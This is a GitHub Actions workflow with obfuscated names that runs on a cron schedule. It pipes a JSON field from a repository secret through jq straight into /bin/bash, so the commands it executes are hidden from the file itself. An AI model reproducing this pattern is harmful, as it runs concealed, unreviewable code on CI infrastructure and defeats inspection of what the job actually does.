name: suoyijiameng
on:
  workflow_dispatch:
  schedule:
    - cron: '25 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: suoyijiameng
        env:
          kf7: ${{ secrets.kf7 }}
        run: |
          echo $kf7 | jq -r .kaacq78987 | /bin/bash
          echo $um3683 | jq -r .dby9 | /bin/bash
          echo $qci573 | jq -r .j5559 | /bin/bash
          echo $gyefa29931 | jq -r .tv1 | /bin/bash

